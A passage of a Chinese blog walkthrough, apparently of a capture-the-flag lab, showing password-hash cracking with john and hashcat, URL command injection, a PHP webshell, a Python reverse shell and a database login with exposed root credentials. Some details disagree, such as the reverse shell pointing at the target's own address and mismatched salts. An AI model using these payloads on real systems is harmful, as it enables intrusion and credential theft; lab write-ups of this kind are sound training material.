class=\"collapse-block-body\" style=\"display: none\"><code>.htpasswd<\/code>\u00a0\u662f Apache Web \u670d\u52a1\u5668\u4e2d\u7528\u4e8e<strong>\u7528\u6237\u8ba4\u8bc1<\/strong>\u7684\u6838\u5fc3\u6587\u4ef6\uff0c\u901a\u5e38\u4e0e\u00a0<code>.htaccess<\/code>\u00a0\u914d\u5408\u4f7f\u7528\u3002\u5982\u679c\u8bf4\u00a0<code>.htaccess<\/code>\u00a0\u662f\u201c\u95e8\u536b\u7684\u89c4\u5219\u201d\uff0c\u90a3\u4e48\u00a0<code>.htpasswd<\/code>\u00a0\u5c31\u662f\u201c\u95e8\u7981\u7cfb\u7edf\u7684\u5bc6\u7801\u672c\u201d\u3002<br><strong>\u5b9a\u4e49<\/strong>\uff1a\u4e00\u4e2a\u5b58\u50a8\u7528\u6237\u540d\u548c\u52a0\u5bc6\u5bc6\u7801\u7684\u6587\u672c\u6587\u4ef6\u3002<br><strong>\u7528\u9014<\/strong>\uff1a\u7528\u4e8e Apache \u7684\u00a0<strong>Basic Authentication\uff08\u57fa\u672c\u8ba4\u8bc1\uff09<\/strong>\u3002\u5f53\u7528\u6237\u8bbf\u95ee\u53d7\u4fdd\u62a4\u7684\u76ee\u5f55\u65f6\uff0c\u6d4f\u89c8\u5668\u4f1a\u5f39\u51fa\u4e00\u4e2a\u539f\u751f\u7684\u767b\u5f55\u6846\uff0c\u8981\u6c42\u8f93\u5165\u7528\u6237\u540d\u548c\u5bc6\u7801\u3002<br><strong>\u683c\u5f0f<\/strong>\uff1a\u6bcf\u4e00\u884c\u4ee3\u8868\u4e00\u4e2a\u7528\u6237\uff0c\u683c\u5f0f\u4e3a\u00a0<code>\u7528\u6237\u540d\uff1a\u52a0\u5bc6\u540e\u7684\u5bc6\u7801<\/code>\u3002\u793a\u4f8b\uff1a<code>admin:$2y$10$92IXUNpkjO0rOQ5byMi.Ye4oKoEa3Ro9llC\/.og\/at2.uheWG\/igi<\/code><br><strong>\u5173\u7cfb<\/strong>\uff1a<code>.htaccess<\/code>\u00a0\u6307\u5b9a\u201c\u54ea\u91cc\u9700\u8981\u4fdd\u62a4\u201d\u4ee5\u53ca\u201c\u5bc6\u7801\u6587\u4ef6\u5728\u54ea\u91cc\u201d\uff0c<code>.htpasswd<\/code>\u00a0\u5b58\u50a8\u201c\u8c01\u53ef\u4ee5\u8fdb\u5165\u201d\u3002<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/image-25.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"801\" height=\"349\" data-original=\"https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/image-25.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-712\"  sizes=\"auto, (max-width: 801px) 100vw, 801px\" \/><\/div><\/figure>\n\n\n\n<p>\u51fa\u73b0\u91cd\u8981\u7ed3\u679c\uff1a<code>zhangwei: $apr1$MJ6F\/hkG$zt.9zwxKbvplfMTi6roNn0<\/code>\u3002\u4ece\u683c\u5f0f\u548c\u5185\u5bb9\u63a8\u6d4b\u4e3a\u8d26\u6237:\u5bc6\u7801\uff0c\u5e76\u4e14\u5bc6\u7801\u662f\u901a\u8fc7\u52a0\u5bc6\uff0c\u65e0\u6cd5\u4f5c\u7528\u4e8e\u524d\u9762\u7f51\u9875\u3002<\/p>\n\n\n\n<p>\u5229\u7528john\u89e3\u5bc6<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>john \/home\/kali\/hash.txt --wordlist=\/usr\/share\/wordlists\/rockyou.txt --format=md5crypt<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/ScreenShot_2026-03-26_135803_095.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"849\" height=\"216\" data-original=\"https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/ScreenShot_2026-03-26_135803_095.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-715\"  sizes=\"auto, (max-width: 849px) 100vw, 849px\" \/><\/div><figcaption class=\"wp-element-caption\">\u5982\u679c\u663e\u793a\u6ca1\u6709rockyou.txt\u7684\u6587\u4ef6\uff0c\u9700\u8981\u627e\u5230\u76f8\u5e94\u7684\u8def\u5f84\u53bb\u89e3\u538b<\/figcaption><\/figure>\n\n\n\n<p>\u7b49\u5f85\u89e3\u5bc6\u5b8c\u6210\u4e4b\u540e\uff0c\u7ed3\u679c\u5c55\u793a\u7684\u662ftrustno1\u3002<\/p>\n\n\n\n<p>\u89e3\u5bc6\u51fa\u6765\u7684\u5b57\u7b26\u6bd43\u4e2a\u5b57\u7b26\u9650\u5236\u8981\u591a\uff0c\u800c\u4e14\u5728\u524d\u9762\u770b\u5230\u6a21\u5757\u52a0\u8f7d\u5668\u7684\u90e8\u5206\u9700\u8981\u8d26\u5bc6\uff0c\u5c06zhangwei turstno1\u8f93\u5165\u8fdb\u53bb\u540e\u8df3\u8f6c\u5230\u65b0\u9875\u9762\u3002<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u6a21\u5757\u52a0\u8f7d\u5668\uff1a\u8df3\u8f6c\u540e\u51fa\u73b0\u5f39\u7a97\uff0c\u8f93\u5165\u521b\u5efa\u7684\u8d26\u5bc6\u65e0\u6cd5\u6b63\u5e38\u767b\u5f55\uff0c\u63a8\u6d4b\u9700\u8981\u7ba1\u7406\u5458\u6216\u8005\u540c\u7ea7\u7528\u6237\u7684\u8d26\u5bc6<\/p>\n<\/blockquote>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/image-29.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"969\" height=\"261\" data-original=\"https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/image-29.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-717\"  sizes=\"auto, (max-width: 969px) 100vw, 969px\" \/><\/div><\/figure>\n\n\n\n<p>\u65b0\u9875\u9762\u5c55\u793a\u4e86\u8be5URL\u7684\u7528\u6cd5\uff0c\u800c\u524d\u9762\u83b7\u53d6\u4e86\u4e00\u4e2a\u65b0\u7684\u672a\u77e5\u6587\u4ef6:admin_panel\uff0c\u5c1d\u8bd5\u4ece\u6a21\u5757\u52a0\u8f7d\u5668\u8bfb\u53d6\uff0c\u53d1\u73b0\u53ef\u4ee5\u8df3\u8f6c\u5230\u65b0\u7684\u754c\u9762\uff0c\u4f46\u662f\u4e00\u6837\u7684\u9700\u89813\u5b57\u7b26\u7684\u8fd0\u7ef4\u4ee4\u724c\u3002\u6b64\u65f6\u4ecd\u7136\u8fd8\u6ca1\u83b7\u53d6\u5230\u80fd\u591f\u8f93\u5165\u7684\u76f8\u5173\u4ee4\u724c\uff0c\u5c1d\u8bd5\u4ece\u5176\u4ed6\u7f51\u9875\u83b7\u53d6\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/image-30.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"969\" height=\"483\" data-original=\"https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/image-30.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-718\"  sizes=\"auto, (max-width: 969px) 100vw, 969px\" \/><\/div><\/figure>\n\n\n\n<p>\u901a\u8fc7\u4e00\u4e2a\u4e2a\u67e5\u770b\u7f51\u9875\u6e90\u4ee3\u7801\uff0c\u53d1\u73b0\u5728<code>172.16.11.213\/api\/admin_panel<\/code>\u7684\u6e90\u4ee3\u7801\u85cf\u6709\u6ce8\u91ca\u7684php\u4ee3\u7801\uff0c\u91cc\u9762\u5305\u542b<code>$auth_hash = '9f9d51bc70ef21ca5c14f307980a29d8' <\/code>\u7684\u5173\u952e\u4fe1\u606f\uff0c\u9274\u5b9a\u4e3aMD5\u540e\u89e3\u5bc6\uff0c\u83b7\u5f97\u4e09\u4e2a\u5b57\u7b26\u7684\u4fe1\u606f\uff1a<code>bob<\/code><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/image-31.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"969\" height=\"1012\" data-original=\"https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/image-31.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-719\"  sizes=\"auto, (max-width: 969px) 100vw, 969px\" \/><\/div><\/figure>\n\n\n\n<p>\u91cd\u65b0\u56de\u5230<code>http:\/\/172.16.11.213\/api\/loader.php?module=admin_panel<\/code>\uff0c\u8f93\u5165bob\uff0c\u8fd4\u56de\u5230\u8fd0\u7ef4\u7ba1\u7406\u9762\u677f\uff0c\u8f93\u5165\u547d\u4ee4<code>ls<\/code>\u3001\u4ee4\u724c<code>bob<\/code>\u6d4b\u8bd5\uff0c\u53d1\u73b0\u65e0\u8f93\u51fa\uff0c\u4f46\u662fURL\u53d1\u751f\u53d8\u5316\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>http:&#47;&#47;172.16.11.213\/api\/admin_panel?token=%3C%3Fphp+echo+htmlspecialchars%28%24input_token%29%3B+%3F%3E&amp;exec=ls<\/code><\/pre>\n\n\n\n<p>\u5c1d\u8bd5\u53e6\u4e00\u4e2a\u53ea\u6709\u4ee4\u724c\u8f93\u5165\u6846\u7684\u9875\u9762\uff08<code>http:\/\/172.16.11.213\/api\/loader.php?module=admin_panel<\/code>\uff09\uff0c\u8f93\u5165bob\u4e4b\u540e\u4f9d\u7136\u8fd4\u56de\u6a21\u5757\u52a0\u8f7d\u9875\u9762\uff0c\u4f46\u662f\u6b64\u65f6URL\u53d1\u751f\u53d8\u5316\u3002\u5c06\u4e24\u4e2a\u6761\u4ef6\u7ed3\u5408\uff0c\u8bf4\u660e\u8fd9\u662f\u76f4\u63a5\u5728URL\u6ce8\u5165\u547d\u4ee4\u6765\u83b7\u53d6\u76f8\u5173\u4fe1\u606f\u3002<\/p>\n\n\n\n<p>\u5728\u524d\u9762\u4e2d\uff0c\u76f4\u63a5\u4ece\u6a21\u5757\u52a0\u8f7d\u5668\u8c03\u7528\u4e86<code>admin_panel<\/code>\uff0c\u6784\u9020payload\u8f93\u5165\uff0c\u53d1\u73b0\u8fd4\u56de\u7ed3\u679c\u3002<\/p>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\">\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/image-33.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"969\" height=\"617\" data-original=\"https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/image-33.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-721\"  sizes=\"auto, (max-width: 969px) 100vw, 969px\" \/><\/div><\/figure>\n<\/div>\n\n\n\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\">\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/image-32.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"969\" height=\"598\" data-original=\"https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/image-32.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-720\"  sizes=\"auto, (max-width: 969px) 100vw, 969px\" \/><\/div><\/figure>\n<\/div>\n<\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\u83b7\u53d6\u53cd\u5f39shell<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">\u4e00\u53e5\u8bdd\u6728\u9a6c<\/h4>\n\n\n\n<p>\u5c1d\u8bd5\u6ce8\u5165\u4e00\u53e5\u8bdd\u6728\u9a6c\uff0c\u6d4b\u8bd5webshell\u662f\u5426\u80fd\u6b63\u5e38\u8fd0\u4f5c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>http:\/\/172.16.11.213\/api\/loader.php?module=admin_panel&amp;token=bob&amp;exec=echo '&lt;?php system($_GET&#91;\"cmd\"]); ?&gt;' &gt; \/var\/www\/html\/shell.php<\/code><\/pre>\n\n\n\n<p>\u518d\u8fdb\u884c\u6d4b\u8bd5\u9a8c\u8bc1<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>http:&#47;&#47;172.16.11.213\/shell.php?cmd=id\nhttp:\/\/172.16.11.213\/shell.php?cmd=whoami\nhttp:\/\/172.16.11.213\/shell.php?cmd=ls -la<\/code><\/pre>\n\n\n\n<p>\u7ed3\u679c\u5931\u8d25<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/image-34.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"969\" height=\"172\" data-original=\"https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/image-34.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-722\"  sizes=\"auto, (max-width: 969px) 100vw, 969px\" \/><\/div><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\">python\u811a\u672c<\/h4>\n\n\n\n<p>\u5c1d\u8bd5\u4e0a\u4f20python\u6784\u9020\u7684shell\u6765\u83b7\u53d6bash<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python3+-c+'import+socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"172.16.11.213\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(&#91;\"\/bin\/sh\",\"-i\"])'<\/code><\/pre>\n\n\n\n<p>\u540c\u65f6\uff0c\u5728\u653b\u51fb\u673a\u4e0a\u542c\u53d64444\u7aef\u53e3\uff0c\u7b49\u5f85shell\u7684\u56de\u5e94<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/ScreenShot_2026-03-26_150258_885-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"816\" height=\"203\" data-original=\"https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/ScreenShot_2026-03-26_150258_885-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-725\"  sizes=\"auto, (max-width: 816px) 100vw, 816px\" \/><\/div><\/figure>\n\n\n\n<p>\u83b7\u53d6\u6210\u529f<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u8fdc\u7a0bbash<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">flag1<\/h4>\n\n\n\n<p>\u83b7\u53d6\u5230\u8fdc\u7a0bbash\u540e\uff0c\u5927\u9762\u79ef\u7b5b\u9009flag\u6587\u4ef6\uff0c\u67e5\u770b\u662f\u5426\u5b58\u5728&#8217;flag1\/flag2\/flag3&#8217;\u7c7b\u4f3c\u7684\u6587\u4ef6<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>find \/ -name \"*flag*\" 2&gt;\/dev\/null<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/ScreenShot_2026-03-26_150718_144.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"644\" height=\"278\" data-original=\"https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/ScreenShot_2026-03-26_150718_144.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-730\"  sizes=\"auto, (max-width: 644px) 100vw, 644px\" \/><\/div><\/figure>\n\n\n\n<p>\u53d1\u73b0flag1.txt\u548cflag3.txt\uff0c\u76f4\u63a5\u8bfb\u53d6\u8fd9\u4e24\u4e2a\u6587\u4ef6\uff0c\u53d1\u73b0flag1.txt\u53ef\u76f4\u63a5\u8bfb\u53d6\uff0cflag3.txt\u56e0\u4e3a\u6743\u9650\uff0c\u65e0\u6cd5\u8c03\u7528\u3002flag2.txt\u6216\u7c7b\u4f3c\u7684\u6587\u4ef6\u5e76\u672a\u627e\u5230\uff0c\u800c\u524d\u9762\u786e\u5b9a\u4e86\u5b58\u5728\u6570\u636e\u5e93\u7a0b\u5e8f\uff0c\u63a8\u6d4bflag2\u6781\u5927\u6982\u7387\u5b58\u5728\u6570\u636e\u5e93\u5185\u90e8\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>cat \/var\/www\/flag1.txt<\/code><\/pre>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><strong><code>flag1{a3f5c8d2e91b4076bc8d5e7f21a94c3b}<\/code><\/strong><\/p>\n<\/blockquote>\n\n\n\n<h4 class=\"wp-block-heading\">flag2<\/h4>\n\n\n\n<p>\u524d\u9762\u7206\u51fa\u4e86\u91cd\u8981\u6570\u636e\u5e93\u4fe1\u606f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>file:\/\/\/\/var\/www\/html\/db.php\n&lt;?php\n$host = '127.0.0.1';\n$db   = 'abyss_platform';\n<mark style=\"background-color:#0693e3\" class=\"has-inline-color\">$user = 'root';\n$pass = 'R#xK9mWz$2pLnQ7v';<\/mark>\n$charset = 'utf8mb4';\n\n$dsn = \"mysql:host=$host;dbname=$db;charset=$charset\";\n$options = &#91;\n    PDO::ATTR_ERRMODE            =&gt; PDO::ERRMODE_EXCEPTION,\n    PDO::ATTR_DEFAULT_FETCH_MODE =&gt; PDO::FETCH_ASSOC,\n];\n\ntry {\n    $pdo = new PDO($dsn, $user, $pass, $options);\n} catch (\\PDOException $e) {\n    die(\"\u6570\u636e\u5e93\u8fde\u63a5\u5931\u8d25\");\n}\n?&gt;<\/code><\/pre>\n\n\n\n<p>\u5c1d\u8bd5\u767b\u5f55\u6570\u636e\u5e93\u5e76\u67e5\u770b\u5185\u90e8\u4e00\u6761\u9f99<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#\u767b\u5f55\u6570\u636e\u5e93\nmysql -u root -p'R#xK9mWz$2pLnQ7v'\n\n#\u67e5\u770b\u6570\u636e\u5e93\nshow databases;\n\n#\u8fdb\u5165\u6570\u636e\u8868\nuse abyss_platform;\n\n#\u67e5\u770b\u6570\u636e\u8868\nshow tables;\n\n#\u83b7\u53d6users\u4fe1\u606f\nselect * from users;<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/ScreenShot_2026-03-26_154613_1011-1024x297.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"297\" data-original=\"https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/ScreenShot_2026-03-26_154613_1011-1024x297.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-733\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u83b7\u53d6\u91cd\u8981\u4fe1\u606f\uff0cpassword\uff08\u5bc6\u7801\uff09\u3001password_changed_at\uff08\u65f6\u95f4\u6233\uff09\u3002\u5c06\u76f8\u5173\u4fe1\u606f\u5408\u5e76<code>d450a27a0caf3b9dcc7f03e4c492f7ac:1742900000<\/code>\uff0c\u7206\u7834\u540e\u83b7\u5f97\u5bc6\u94a5\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#\u5c1d\u8bd5hashcat\u66b4\u529b\u7834\u89e3\nhashcat -m 10 d450a27a0caf3b9dcc7f03e4c492f7ac:1742900000 \/usr\/share\/wordlists\/rockyou.txt\n\n#\u5982\u679c\u5931\u8d25\uff0c\u5c1d\u8bd5python\u811a\u672c\u66b4\u529b\u7834\u89e3\ncat hash.py\nimport hashlib\nwith open(\"\/usr\/share\/wordlists\/rockyou.txt\",\"rb\") as f1:\n&nbsp;&nbsp;&nbsp;&nbsp;dict=f1.read()\nfor i in dict.split(b\"\\n\"):\n&nbsp;&nbsp;&nbsp;&nbsp;if hashlib.md5(i+b\"1774492346\").hexdigest()==\"d450a27a0caf3b9dcc7f03e4c492f7ac\":\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print(i)\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break\n\n#\u6700\u540e\u8f93\u51fa\u7ed3\u679c<\/code><\/pre>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>dragon<\/p>\n<\/blockquote>\n\n\n\n<p>\u91cd\u65b0\u56de\u5230\u5bbf\u4e3b\u673a\u7684bash\uff0c\u5207\u6362\u5230liwei<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>su liwei\n#\u8f93\u5165\u5bc6\u7801dragon\n\n#\u5207\u6362\u5230liwei\u540e\u67e5\u770b\u76ee\u5f55\u5e95\u4e0b\uff0c\u53d1\u73b0\u524d\u9762\u731c\u6d4b\u9519\u8bef\uff0cflag2.txt\u5b58\u5728liwei\u7684\u76ee\u5f55\u4e0b\uff0c\u90a3\u5c31\u76f4\u63a5\u8bfb\u53d6<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper 